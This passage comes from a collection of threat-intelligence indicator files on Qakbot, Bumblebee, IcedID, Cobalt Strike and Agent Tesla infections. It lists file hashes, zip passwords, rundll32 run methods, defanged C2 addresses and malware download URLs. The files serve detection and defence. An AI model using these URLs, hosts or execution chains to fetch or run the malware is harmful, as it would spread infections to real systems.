7d1d7d196b3932e4e3e7cc1159f0e3ebab252f6a5f1ed6000f78d2133052a0de 15 | - File size: 435,392 bytes 16 | - File name: AFL27.zip 17 | - File description: Password-protected zip archive downloaded from link in email 18 | - Password: P32M 19 | 20 | - SHA256 hash: 3da1cb0608f3709bf1331c4088fb258daf0200740b9b67afc6eec68a7f4b111a 21 | - File size: 759,808 bytes 22 | - File name: AFL27.iso 23 | - File description: ISO disk image extracted from the above zip archive 24 | 25 | CONTENTS OF ISO IMAGE: 26 | 27 | - SHA256 hash: d0f396309db14bbe988e8ae6ba6dfb4451fc9db830484dcb7dec830b74d8467a 28 | - File size: 9,491 byte 29 | - File location\name: AS.js 30 | - File location\name: peseta\flours.js 31 | - File description: Script used to run PowerShell script at peseta\gratiae.ps1 32 | 33 | - SHA256 hash: e6f4fe47c6e08c3b995b5e69efee09a853426607d64715bb1cf215640f785d58 34 | - File size: 367 bytes 35 | - File location\name: peseta\gratiae.ps1 36 | - File description: Powershell script used to convert base64 text at peseta\data.txt to a Qakbot DLL and run it 37 | 38 | - SHA256 hash: 9a6a43b0cdd989c911896933202401b848d2502db0219632f3aaa04a2e4687a4 39 | - File size: 645,120 bytes 40 | - File location\name: peseta\data.txt 41 | - File description: base64 text representing Qakbot DLL 42 | 43 | QAKBOT DLL GENERATED BY CONTENTS OF ISO IMAGE: 44 | 45 | - SHA256 hash: 9546ad96dd59612da1ea20637613ad0c1154e599b3c5a37b5404f4301cf78348 46 | - File size: 483,840 bytes 47 | - File location: C:\Users\Public\test1.txt 48 | - File description: 32-bit DLL for BB08 distribution Qakbot 49 | - Run method: rundll32.exe [filename],DrawThemeIcon 50 | 51 | QAKBOT C2 ACTIVITY: 52 | 53 | - 108.162.6[.]34:443 - HTTPS traffic 54 | - 86.159.48[.]25:2222 - HTTPS traffic 55 | 56 | QAKBOT TRAFFIC TO LEGITIMATE DOMAINS: 57 | 58 | - cisco.com 59 | - www.cisco.com 60 | - broadcom.com 61 | - www.broadcom.com 62 | - google.com 63 | - www.google.com 64 | - irs.gov 65 | - www.irs.gov 66 | - linkedin.com 67 | - 
www.linkedin.com 68 | - microsoft.com 69 | - www.microsoft.com 70 | - oracle.com 71 | - www.oracle.com 72 | - xfinity.com 73 | - www.xfinity.com 74 | 75 | NOTES: 76 | 77 | - The above are legitimate domains used by Qakbot as a connectivity check before each C2 connection. 78 | - Qakbot malware implemented this method as early as 2022-10-31. 79 | - Could be an anti-analysis method for isolated Windows hosts without Internet connectivity; because these are legitimate domains, they should not be treated as block-list or alerting indicators. 80 | 81 | COBALT STRIKE C2 ACTIVITY: 82 | 83 | - 108.177.235[.]29:443 - jesofidiwi[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2022-12-07-IOCs-for-Bumblebee-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-12-07 (WEDNESDAY) - BUMBLEBEE INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - The .img disk image file used for this Bumblebee infection was submitted to VirusTotal on Tuesday 2022-12-06. 6 | - The delivery method for this .img file could not be determined. 7 | - No Cobalt Strike binary was saved to disk. 8 | - Certificate data for Cobalt Strike HTTPS traffic (Not Before date of 2022-11-15, see below) suggests the server was established on or around 2022-11-15. 9 | 10 | DISK IMAGE: 11 | 12 | - SHA256 hash: 1367bcb44c70baf0ff20e488c38a6efde51eb61d14abb0292d848800a88f7961 13 | - File size: 2,097,152 bytes 14 | - File name: unknown, possibly PFFMDdY6E.img 15 | - File description: Disk image with contents used for Bumblebee infection 16 | - Note: File mounts as disk image in Win 10/11, but it's not identified as a disk image in VirusTotal or using the *nix file command. 
17 | 18 | CONTENTS OF THE ABOVE DISK IMAGE: 19 | 20 | - SHA256 hash: ac8e67644d7b6b6f0bd78522a3568c98fe386a23542f73a2ec1a3cff4f433684 21 | - File size: 1,745 bytes 22 | - File name: order.lnk 23 | - File description: Windows shortcut, only visible file in the disk image 24 | - Shortcut: C:\Windows\System32\cmd.exe /c matrix.bat 25 | 26 | - SHA256 hash: d084bcd4d01dc5964e31910bc90ca4574d6270e1e57f01af7c633ee02e0a6d06 27 | - File size: 3,091 bytes 28 | - File name: matrix.bat 29 | - File description: Batch file that copies the Bumblebee DLL to disk, runs it, and sets a scheduled task to keep it persistent. 30 | 31 | - SHA256 hash: 1436cd7b3ec8fc3941292fad31475711a89b050bd1d87cdbbbf2866394dad099 32 | - File size: 851,968 bytes 33 | - File name: worldsex.dll 34 | - Saved to disk at: C:\ProgramData\worldsex.dll 35 | - File description: 64-bit DLL for Bumblebee malware 36 | - Run method: rundll32.exe [filename],mainRngSet 37 | 38 | MALWARE NOTES: 39 | 40 | - C:\Windows\System32\rundll32.exe was copied to C:\ProgramData\oiv0I4ymqE.exe and run by a scheduled task to load the Bumblebee DLL. The renamed copy has the hash of the legitimate binary, so detection should key on the unusual path and the scheduled task rather than the file hash. 
41 | 42 | INFECTION TRAFFIC: 43 | 44 | - 88.52.50[.]98 port 452 - attempted TCP connections for Bumblebee C2 45 | - 81.77.212[.]213 port 118 - attempted TCP connections for Bumblebee C2 46 | - 139.177.146[.]137 port 443 - HTTPS traffic for Bumblebee C2 47 | - 23.108.57[.]213 port 443 - ceyuvigi[.]com - HTTPS traffic for Cobalt Strike 48 | 49 | CERTIFICATE ISSUER DATA FOR COBALT STRIKE SERVER AT 23.108.57[.]213: 50 | 51 | Subject Name: 52 | - Common Name: ceyuvigi[.]com 53 | 54 | Issuer Name: 55 | - Country: GB 56 | - State/Province: Greater Manchester 57 | - Locality: Salford 58 | - Organization: Sectigo Limited 59 | - Common Name: Sectigo RSA Domain Validation Secure Server CA 60 | 61 | Validity: 62 | - Not Before: Tue, 15 Nov 2022 00:00:00 GMT 63 | - Not After: Wed, 15 Nov 2023 23:59:59 GMT 64 | 65 | Subject Alt Names: 66 | - DNS Name: ceyuvigi[.]com 67 | - DNS Name: www.ceyuvigi[.]com 68 | -------------------------------------------------------------------------------- /2022-12-09-IOCs-for-HTML-smuggling-to-ISO-files-for-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-12-09 (FRIDAY): HTML SMUGGLING PUSHES COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - unknown, possibly email --> HTML file (possibly attachment) --> downloaded ISO image --> Windows shortcut --> runs Powershell script 6 | 7 | NOTES: 8 | 9 | - This activity is a continuation of activity reported as early as 2022-12-05 at: https://twitter.com/James_inthe_box/status/1599787857467834368 10 | - In this most recent wave, at least 8 HTML files have been submitted to VirusTotal since 2022-12-09, all have names starting with DMCA-Report- and ending with an .html file extension. 11 | - No proof of delivery vector, but these were likely sent as email attachments. 
12 | 13 | EXAMPLE OF ATTACHED HTML FILE AND SMUGGLED ISO IMAGE: 14 | 15 | - SHA256 hash: 81fa36b1d5e9f5457644fc784f2e03d14734052c35023e899ba521697d0bbef9 16 | - File size: 1,780,737 bytes 17 | - File name: DMCA-Report-67718961029992.html 18 | - File description: Likely email attachment (delivery not confirmed), HTML file used for smuggling the below ISO image 19 | 20 | - SHA256 hash: c897cd5eb6d4c569f9a540bafb0f966f14e960826266648c08a15f5a48ba58db 21 | - File size: 874,496 bytes 22 | - File name: DMCA-Report-87f1e5e70079d.iso 23 | - File description: ISO image presented by the above HTML file 24 | 25 | CONTENTS OF ISO IMAGE: 26 | 27 | - SHA256 hash: 7ffbeb1df7b0dcb06ddc0e54b7e06b338bf4901461022b0af7fe4b97d12ab4ef 28 | - File size: 2,179 bytes 29 | - File name: DMCA-Report.lnk 30 | - File description: Windows shortcut, only visible file in ISO image 31 | 32 | - SHA256 hash: 5799028ec3ad388e031fc42cd0fb5443a5a5e0a7e3e57c895a3f9e4ce4c2e9ee 33 | - File size: 34,098 bytes 34 | - File name: xqdxcxlgtxeesj.log 35 | - File description: PowerShell script run by above Windows shortcut 36 | 37 | - SHA256 hash: 7cdf0263c3ce42e3ff3ea3c0a376e1aa1b0340dfc1e373f3c765a51a3a639be8 38 | - File size: 453,626 bytes 39 | - File name: wnjvejahaimreqt.log 40 | - File description: PowerShell script run by above PowerShell script 41 | 42 | - SHA256 hash: 3902e1734b1d0187d3404dafa4616212342630cb46913242060f485e58201a75 43 | - File size: 11,140 bytes 44 | - File name: zvdcoglidj.pdf 45 | - File description: Decoy PDF file opened during infection process that states, "Couldn't open PDF" 46 | 47 | COBALT STRIKE TRAFFIC: 48 | 49 | - 165.22.48[.]183 port 80 - 165.22.48[.]183 - GET /common?chunk=false HTTP/1.1 50 | - 165.22.48[.]183 port 80 - 165.22.48[.]183 - POST /tab_shop HTTP/1.1 (application/x-www-form-urlencoded) 51 | -------------------------------------------------------------------------------- /2022-12-20-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt: 
-------------------------------------------------------------------------------- 1 | 2022-12-20 (TUESDAY): ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - The initial zip archive is likely from a fake software page referred to from a Google ad. 6 | - For more information, see: https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344/ 7 | 8 | DOWNLOADED ZIP AND EXTRACTED ISO IMAGE: 9 | 10 | - SHA256 hash: 533fcedd97d1ef374629c61f7482bb5711b366ac025f648b92f924111f676c5a 11 | - File size: 585,550 bytes 12 | - File name: Setup_Win_20-12-2022_13-48-52.zip 13 | - File description: Zip archive likely downloaded from fake software page 14 | 15 | - SHA256 hash: 866a63ec6d217e594a69b34bfe3a629c4eac3b6f117fe191df1a2bac3b4f5491 16 | - File size: 2,818,048 bytes 17 | - File name: Setup_Win_20-12-2022_13-48-52.iso 18 | - File description: ISO image extracted from the above zip archive 19 | 20 | CONTENTS OF ISO IMAGE: 21 | 22 | - SHA256 hash: 6a973a28800a689db38973fa0465a80915200e5d1e8a5ca0a7876cfb7428270c 23 | - File size: 2,990 bytes 24 | - File name: LicenseSoft_12-19.lnk 25 | - File description: Windows shortcut used to run the installer DLL for IcedID below 26 | - Shortcut: rundll32.exe \liemap.dat,init 27 | 28 | - SHA256 hash: 90551d31eb982f6e35514e0d028465f9699b21fccdc3e7a1ca53f839b5055a98 29 | - File size: 1,363,734 bytes 30 | - File name: liemap.dat 31 | - File description: 64-bit DLL installer for IcedID 32 | - Run method: rundll32.exe [filename],init 33 | 34 | MALWARE/ARTIFACTS FROM AN INFECTION: 35 | 36 | - SHA256 hash: 8ec930ccc29c7a7ee877ab046203f7770b21e5740f2ca826abdfc3a6ca6a04b6 37 | - File size: 1,713,300 bytes 38 | - File location: hxxp://trbiriumpa[.]com/ 39 | - File description: gzip binary on trbiriumpa[.]com retrieved by above IcedID installer 40 | 41 | - SHA256 hash: 509628d0ce1f30b6ce77aa484fb687aa23fa9d7ee73ed929e149eee354b3a3b0 42 | - File size: 352,906 bytes 43 | - File location: 
C:\Users\[username]\AppData\Roaming\SpendMesh\license.dat
HTTP/1.1 302 Found 7 | - Location: hxxps://bdppay[.]com?gclid=EAIaIQobChMI8uLGoJif_AIVSRXUAR2NzgMREAAYASAAEgLOo_D_BwE 8 | 9 | TRAFFIC REDIRECTION URL: 10 | 11 | - 91.217.9[.]70 port 443 12 | - URL: hxxps://bdppay[.]com/?gclid=EAIaIQobChMI8uLGoJif_AIVSRXUAR2NzgMREAAYASAAEgLOo_D_BwE 13 | - Response: HTTP/1.1 302 Found 14 | - Location: Location: hxxps://adobereaders[.]co 15 | 16 | FAKE ADOBE READER SITE: 17 | 18 | - 198.54.114[.]160 port 443 - hxxps://adobereaders[.]co/ 19 | 20 | MALWARE DOWNLOAD URL FROM FAKE ADOBE READER SITE: 21 | 22 | - 198.54.114[.]160 port 443 - hxxps://bravebrowsers[.]cc/setup_4.21.exe 23 | 24 | DOWNLOADED MALWARE: 25 | 26 | - SHA256 hash: 37082f0b757d6c249b870c29872a9bf8e38e344150735d9b6d2a64364b18b226 27 | - File size: 288,256 bytes 28 | - File name: setup_4.21.exe 29 | - File description: Windows executable file for infostealer and possible backdoor malware 30 | 31 | POST-INFECTION TRAFFIC: 32 | 33 | - DNS query for system-checki[.]com - response: No such name 34 | - port 443 - keyauth[.]win - HTTPS trafic, Legitimate site 35 | - 78.47.195[.]75 port 4449 - TLS v1.0 traffic 36 | - 78.47.195[.]75 port 4448 - TCP traffic with host data and screenshot of victim's desktop 37 | 38 | CERTIFICATE ISSUER DATA FROM SERVER AT 78.47.195[.]75: 39 | 40 | - id-at-commonName=PEGASUS SERVER 41 | - id-at-organizationalUnitNmae=PEGASUS 42 | - id-at-organizationName=PEGASUS By SKYNET 43 | - id-at-localityName=SH 44 | - id-at-countryName=CN 45 | 46 | CERTIFICATE SUBJECT DATA FROM SERVER AT 78.47.195[.]75: 47 | 48 | - id-at-commonName=PEGASUS -------------------------------------------------------------------------------- /2023-01-05-IOCs-from-Agent-Tesla-variant-infection.txt: -------------------------------------------------------------------------------- 1 | 2023-01-05 (THURSDAY) - MALSPAM CAUSES INFECTION FOR AGENT TESLA VARIANT, POSSIBLY ORIGINLOGGER 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> attached .iso file --> contains .exe file --> .exe loads encoded 
binary --> binary decoded & used to generate Agent Telsa-style traffic 6 | 7 | NOTES: 8 | 9 | - This malware triggers alerts for Agent Tesla, but it is likely OriginLogger as discussed here: https://unit42.paloaltonetworks.com/originlogger/ 10 | 11 | - The malware EXE used for this infection rettrieves XOR-encoded binary from a web server. 12 | - The XOR-encoded binary is decoded into a malicious DLL that is used to generate Agent Tesla-style traffic. 13 | - The decoded DLL is not saved to disk. 14 | - The infected host will start thise entire process again after the host is rebooted, or the victim logs off & logs back in. 15 | 16 | EMAIL INFORMATION FROM MALSPAM: 17 | 18 | - Received: from multisped.com.mk (multisped.com.mk [185.250.254.32]); Thu, 5 Jan 2023 04:18:36 +0000 (UTC) 19 | - From: JPMorgan Chase Bank N.A 20 | - Subject: BANK PAYMENT NOTIFICATION 21 | - Attachment name: Payment Copy_Chase Bank_Pdf.iso 22 | 23 | ASSOCIATED FILES: 24 | 25 | - SHA256 hash: 926a3142270a52f8afb93490d5dd21f0ca23bc0815ee6630068cf6409d8ee448 26 | - File size: 1,245,184 bytes 27 | - File name: Payment Copy_Chase Bank_Pdf.iso 28 | - File type: UDF filesystem data (version 1.5) 'PAYMENT_COPY_CHASE_BANK_PDF' 29 | - File description: This file mounts as a disk image on Windows and Mac hosts 30 | 31 | - SHA256 hash: 5016ba92afac1c2b2a2a6b17a09406869bd6f58cfe680f25030af1a1ba1c29a2 32 | - File size: 26,112 bytes 33 | - File name: Payment Copy_Chase Bank_Pdf.exe 34 | - File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows 35 | - File description: Windows EXE retreived from the above .iso file 36 | 37 | - SHA256 hash: 90d977ca0a3331d78005912d2b191d26e33fa2c6ef17602d6173164ba83fd85e 38 | - File size: 664,576 bytes 39 | - File location: hxxp://savory.com[.]bd/sav/Ztvfo.png 40 | - File type: data 41 | - File description: Malicious binary XOR-ed with the ASCII string: Sfhdjkpkowgnpcgoshb 42 | 43 | - SHA256 hash: 
3883d374ba0736254a89e310b86f3c3769adcaed471b103b5c0a8a2f16cf5c8d 44 | - File size: 664,576 bytes 45 | - File type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows 46 | - File description: Malicious DLL file decoded from the above binary 47 | 48 | INFECTION TRAFFIC: 49 | 50 | - 45.56.99[.]101 port 80 - savory.com[.]bd - GET /sav/Ztvfo.png 51 | - port 443 - api.ipify.org - HTTPS traffic, IP address by the infected Windows host, not inherently malicious 52 | - 204.11.58[.]28 port 587 - mail.transgear[.]in - unencrypted SMTP traffic generated by Agent Tesla variant -------------------------------------------------------------------------------- /2023-01-12-IOCs-from-IcedID-and-Cobalt-Strike-infection.txt: -------------------------------------------------------------------------------- 1 | 2023-01-23 (THURSDAY) - ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> attached PDF --> password-protected zip --> extracted ISO --> files to run IcedID installer --> IcedID C2 --> Cobalt Strike 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: 1d769af38bea969c00501ff64b51f4e4fd2de2bedc7785b3471b7d12765c1a7d 10 | - file size: 139,342 bytes 11 | - File name: Document_251_Unpaid_-1-12.pdf 12 | - File description: Example of PDF used to download passwor-protected zip for IcedID infection. 
13 | 14 | - SHA256 hash: fbeffaaf34d13cd45e2e545172db2287fead4ed05c04c0e8da549a0869d2fa96 15 | - file size: 110,732 bytes 16 | - File name: Document_224_Copy_01-12.zip 17 | - File description: password-protected zip archive downloaded from firebasestorage.googleapis[.]com URL in above PDF 18 | - Password: z5247 19 | 20 | - SHA256 hash: 9661ba9658bf85409cc414b8f62aaca490ac9f75aa4c2a146795945cf014b211 21 | - file size: 1,376,256 bytes 22 | - File name: Document_224_Copy_01-12.iso 23 | - File description: Disk image containing files for IcedID 24 | 25 | CONTENTS OF THE ISO IMAGE: 26 | 27 | - SHA256 hash: 1e84f66e29d4c0263d3b67bc9a694eabdff306fc83635bb1d4bd5d4c894c8428 28 | - file size: 1,978 bytes 29 | - File name: Document.lnk 30 | - File description: Windows shortcut that runs hidden .cmd file below 31 | 32 | - SHA256 hash: 156ed6c025b8d1dcfa8b3f9a183fc89fbbedc9f2cb178806ad23c2663a1d345c 33 | - file size: 1,593 bytes 34 | - File name: negconrodl\bogpacsipr.cmd 35 | - File description: Command line script used to run the IcedID installer DLL 36 | 37 | - SHA256 hash: 65281fe83e22bde20fa56079bebaea6fb353d1036be8073924fdf64cd9194984 38 | - file size: 194,440 bytes 39 | - File name: negconrodl\outgoing.dat 40 | - File description: IcedID installer DLL (64-bit) 41 | - Run method: rundll32.exe [filename],init 42 | 43 | FILE FROM AN INFECTION: 44 | 45 | - SHA256 hash: 6b22df802f36a9ab0a1f963304fcfcba7cf4b7a922ac123ac2d53240f18c3ab5 46 | - file size: 544,003 bytes 47 | - File location: hxxp://allertmnemonkik[.]com/ 48 | - File description: gzip binary retrieved by above IcedID installer DLL 49 | 50 | - SHA256 hash: 509628d0ce1f30b6ce77aa484fb687aa23fa9d7ee73ed929e149eee354b3a3b0 51 | - file size: 352,906 bytes 52 | - File location: C:\Users\[username]\AppData\Roaming\HoleWheel\license.dat 53 | - File description: data binary used to run persistent IcedID DLL 54 | 55 | - SHA256 hash: e144b75d9cb85a5decf7895c824c025bc0f163af81094078130a2826328165eb 56 | - file size: 190,344 
bytes 57 | - File location: C:\Users\[username]\AppData\Local\{7FB4161A-1942-0027-7D5F-A43B70B656A5}\Reexbw64.dll",Reexbw64.dll 58 | - File description: Persistent IcedID DLL 59 | - Run method: rundll32.exe [filename],init --qume="[path to license.dat]" 60 | 61 | - SHA256 hash: 4c9364c85bd1e8a2fb53181696d6471ae10971f4cc709419dfaf6224b23b9f55 62 | - file size: 540,672 bytes 63 | - File location: hxxp://199.127.60[.]47/download/sg.exe 64 | - File description: 64-bit Windows EXE for Cobalt Strike 65 | 66 | URL FOR ZIP ARCHIVE DOWNLOAD: 67 | 68 | - hxxps://firebasestorage.googleapis[.]com/v0/b/cobalt-nomad-372419.appspot.com/o/OwSq1IMH1D%2FDocument_224_Copy_01-12.zip?alt=media& 69 | token=aa49349f-ed98-456b-85c4-ce74daf4a0e3 70 | 71 | TRAFFIC GENERATED BY ICEDID INSTALLER DLL FOR GZIP BINARY: 72 | 73 | - 162.33.177[.]186 port 80 - allertmnemonkik[.]com - GET / 74 | 75 | ICEDID C2 TRAFFIC: 76 | 77 | - 103.208.85[.]127 port 443 - turelomi[.]hair - HTTPS traffic 78 | - 94.140.115[.]3 port 443 - lezhidov[.]cloud - HTTPS traffic 79 | - 5.230.74[.]203 port 443 - qzmeat[.]cyou - HTTPS traffic 80 | 81 | COBALT STRIKE TRAFFIC: 82 | 83 | - 199.127.60[.]47 port 80 - 199.127.60[.]47 - GET /download/sg.exe 84 | - 185.173.34[.]36 port 443 - fepopeguc[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2023-01-23-IOCs-for-Google-ad-for-possible-TA505-activity.txt: -------------------------------------------------------------------------------- 1 | 2022023-01-23 (MONDAY): GOOGLE AD --> FAKE ANYDESK PAGE --> POSSIBLE TA505 ACTIVITY 2 | 3 | NOTES: 4 | 5 | - Download-cdn[.]com seen in today's traffic is associated with infrastructure previously used for TA505's "Get2" (GetandGo) loader. 6 | - TA505's Get2 loader was last seen in 2020, back when threat actors more commonly used Microsoft Office documents as initial lures. 
7 | 8 | INFECTION CHAIN: 9 | 10 | - Google ad --> fake AnyDesk page --> MSI --> traffic for persistent DLL --> traffic for additional DLL --> post-infection C2 11 | 12 | GOOGLE AD: 13 | 14 | - hxxps://www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwjXyOnToN78AhW3fG8EHXGmBggYABABGgJqZg&ohost=www.google.com& 15 | cid=CAASJuRoQHLL0UjPJuRfBwY5hCvWnzj89qG_kmWAzxtkdnaNbPIElHZF&sig=AOD64_3_5-fOmGsshEyXOapF53KCoq3rWA&q& 16 | adurl&ved=2ahUKEwiOwuHToN78AhVGlGoFHRkEAOMQ0Qx6BAgLEAE 17 | 18 | - 188.127.239[.]132 - hxxps://www.amydecke[.]online/?gclid=EAIaIQobChMI18jp06De_AIVt3xvBB1xpgYIEAAYASAAEgK_1PD_BwE 19 | 20 | FAKE ANYDESK PAGE: 21 | 22 | - 191.101.13[.]129 - hxxps://anydeskcloud[.]tech/?gclid=EAIaIQobChMI18jp06De_AIVt3xvBB1xpgYIEAAYASAAEgK_1PD_BwE 23 | 24 | MSI FILE DOWNLOAD 25 | 26 | - 191.101.13[.]129 - hxxps://anydeskcloud[.]tech/download/AnyDeskSetup_26b30163.msi 27 | 28 | DOWNLOADED MSI FILE: 29 | 30 | - SHA256 hash: e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c 31 | - File size: 11,544,064 bytes 32 | - File name: AnyDeskSetup_26b30163.msi 33 | - File description: MSI installer for TA505 malware 34 | - Sample: https://bazaar.abuse.ch/sample/e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c/ 35 | - Note: SAH256 hash for this sample was first reported in VT on 2022-12-01. 
36 | 37 | INFECTION TRAFFIC: 38 | 39 | - 152.89.196[.]75 - hxxps://download-cdn[.]com/download.php?f=Ldrp.dll&from=AnyDeskSetup_26b30163.msi <-- DLL for persistent malware 40 | - 152.89.196[.]75 - hxxps://download-cdn[.]com/pload/26b30163 <-- Follow-up DLL retrieved by persistent malware 41 | 42 | EXAMPLE OF PERSISTENT MALWARE: 43 | 44 | - SHA256 hash: caaea7ec83956a823420a78dec430fddb5db65d9fa4bc6555659b9b0c05c817a 45 | - File size: 112,640 bytes 46 | - File location: hxxps://download-cdn[.]com/download.php?f=Ldrp.dll&from=AnyDeskSetup_26b30163.msi 47 | - File location: C:\ProgramData\1c220cdc.dat 48 | - File description: DLL used to keep TA505 malware persistent 49 | - Sample: https://bazaar.abuse.ch/sample/caaea7ec83956a823420a78dec430fddb5db65d9fa4bc6555659b9b0c05c817a/ 50 | - Run method: rundll32.exe [filename],#2 51 | - Note: File hash and file name is different each time the MSI file installer is run, although file size and 52 | placement under C:\ProgramData\ directory remain consistent. 
53 | 54 | POST-INFECTION C2 TRAFFIC: 55 | 56 | - 64.190.113[.]123:443 - TCP traffic 57 | 58 | EXAMPLE OF MALWARE RESPONSIBLE FOR POST-INFECTION TRAFFIC: 59 | 60 | - SHA256 hash: e14ee6302076a2bb9e5634407500757319d5de9c45305ec6269120b7283b24cf 61 | - File size: 94,720 bytes 62 | - File location: hxxps://download-cdn[.]com/pload/26b30163 63 | - File description: DLL retreived by persistent malware but not saved to disk 64 | - Sample: https://bazaar.abuse.ch/sample/e14ee6302076a2bb9e5634407500757319d5de9c45305ec6269120b7283b24cf/ 65 | - Note: File hash is different each time this file is retrieved from download-cdn[.]com 66 | -------------------------------------------------------------------------------- /2023-01-31-BB12-Qakbot-infection-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2023-01-31 (TUESDAY) - QAKBOT INFECTION (DISTRIBUTION TAG: BB12) WITH COBALT STRIKE AND VNC ACTIVITY 2 | 3 | NOTES: 4 | 5 | - Qakbot stopped sending new spam near the end of December 2022. 6 | - On 2023-01-31, Qakbot returned from an absence of approximately 1 month and began spamming again. 7 | - Since its return, Qakbot has been using malicious OneNote (.one) files as the initial malware lure. 8 | - Post-infection activity from our Qakbot test run today includes Cobalt Strike and VNC traffic. 
9 | 10 | BB12 INFECTION CHAIN: 11 | 12 | - email --> link --> downloaded zip --> extracted .one file --> embedded .hta file -- traffic for Qakbot DLL --> Qakbot C2 13 | 14 | OBAMA234 INFECTION CHAIN: 15 | 16 | - thread-hijacked email --> attached .one file --> embedded .hta file -- traffic for Qakbot DLL --> Qakbot C2 17 | 18 | MALWARE FROM AN INFECTED WINDOWS HOST: 19 | 20 | - SHA256 hash: cbd7136dcdc7746124d93dc05d461ee5def7fc1b498183f453d4cb0c3b4926b6 21 | - File size: 142,620 bytes 22 | - File name: 408709.one.zip 23 | - File location: hxxps://aixjobsonline[.]net/SFAF.php?PPSIITERISAC=1 24 | - File description: Zip archive downloaded from link in email distributing Qakbot 25 | 26 | - SHA256 hash: 002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c 27 | - File size: 185,696 bytes 28 | - File name: 408709.one 29 | - File description: OneNote file extracted from the above zip archive 30 | 31 | - SHA256 hash: 145e9558ad6396b5eed9b9630213a64cc809318025627a27b14f01cfcf644170 32 | - File size: 2,536 bytes 33 | - File name: attachment.hta 34 | - File description: .hta file attached to above OneNote file, used to download/run the Qakbot DLL 35 | 36 | - SHA256 hash: d6e499b57fdf28047d778c1c76a5eb41a03a67e45dd6d8e85e45bac785f64d42 37 | - File size: 743,422 bytes 38 | - File location: hxxps://rmbonlineshop[.]com/VV71d8/300123.gif 39 | - File location: C:\ProgramData\121.png 40 | - File description: DLL for Qakbot (32-bit) retrieved by the above .hta file 41 | - Run method: rundll32 [filename],Wind 42 | - Note: This is a different size and file hash each time the file is downloaded 43 | 44 | TRAFFIC FROM AN INFECTION: 45 | 46 | LINK FROM EMAIL SENDING ZIP ARCHIVE: 47 | 48 | - hxxp://aixjobsonline[.]net/SFAF.php?PPSIITERISAC=1 49 | - port 443 - aixjobsonline[.]net - HTTPS traffic 50 | 51 | MALICIOUS .HTA IN .ONE FILE RETRIEVES QAKBOT DLL: 52 | 53 | - port 443 - (HTTPS traffic) - hxxps://rmbonlineshop[.]com/VV71d8/300123.gif 54 | 55 | QAKBOT C2 TRAFFIC TO 
LEGITIMATE DOMAINS: 56 | 57 | - port 443 - broadcom.com - HTTPS traffic 58 | - port 443 - cisco.com - HTTPS traffic 59 | - port 443 - google.com - HTTPS traffic 60 | - port 443 - irs.gov - HTTPS traffic 61 | - port 443 - linkedin.com - HTTPS traffic 62 | - port 443 - microsoft.com - HTTPS traffic 63 | - port 443 - oracle.com - HTTPS traffic 64 | - port 443 - verisign.com - HTTPS traffic 65 | - port 443 - xfinity.com - HTTPS traffic 66 | - port 443 - yahoo.com - HTTPS traffic 67 | - port 443 - www.openssl.org - HTTPS traffic 68 | 69 | QAKBOT C2 TRAFFIC: 70 | 71 | - 87.10.205[.]117 port 443 - HTTPS traffic 72 | - 82.121.195[.]187 port 2222 - HTTPS traffic 73 | - 92.8.190[.]175 port 2222 - HTTPS traffic 74 | - 5.75.205[.]43 port 443 - HTTPS traffic 75 | - 23.111.114[.]52 port 65400 - TCP traffic 76 | 77 | COBALT STRIKE TRAFFIC: 78 | 79 | - 104.237.219[.]36 port 443 - ciruvowuto[.]com - HTTPS traffic 80 | - 104.237.219[.]36 port 443 - HTTPS traffic 81 | - 104.237.219[.]36 port 8888 - ciruvowuto[.]com - HTTPS traffic 82 | 83 | VNC TRAFFIC: 84 | 85 | - 78.31.67[.]7 port 443 86 | -------------------------------------------------------------------------------- /2023-02-08-IOCs-for-Cobalt-Strike-from-IcedID.txt: -------------------------------------------------------------------------------- 1 | 2023-02-08 (WEDNESDAY) - COBALT STRIKE FROM ICEDID (BOKBOT) INFECTION 2 | 3 | NOTES: 4 | 5 | - IcedID infection generated using a OneNote file reported earlier today by @k3dg3 at: 6 | -- https://twitter.com/k3dg3/status/1623333951069646857 7 | 8 | ICEDID TRAFFIC: 9 | 10 | - 80.66.88[.]143 port 80 - ehonlionetodo[.]com - GET / 11 | - 94.232.46[.]221 port 443 - noosaerty[.]com - HTTPS traffic 12 | - 37.252.6[.]77 port 443 - palasedelareforma[.]com - HTTPS traffic 13 | 14 | COBALT STRIKE TRAFFIC: 15 | 16 | - 167.172.154[.]189 port 80 - 167.172.154[.]189 - GET /36.ps1 17 | - 167.172.154[.]189 port 80 - 167.172.154[.]189 - GET /b360802.dll 18 | - 79.132.128[.]191 port 443 - 
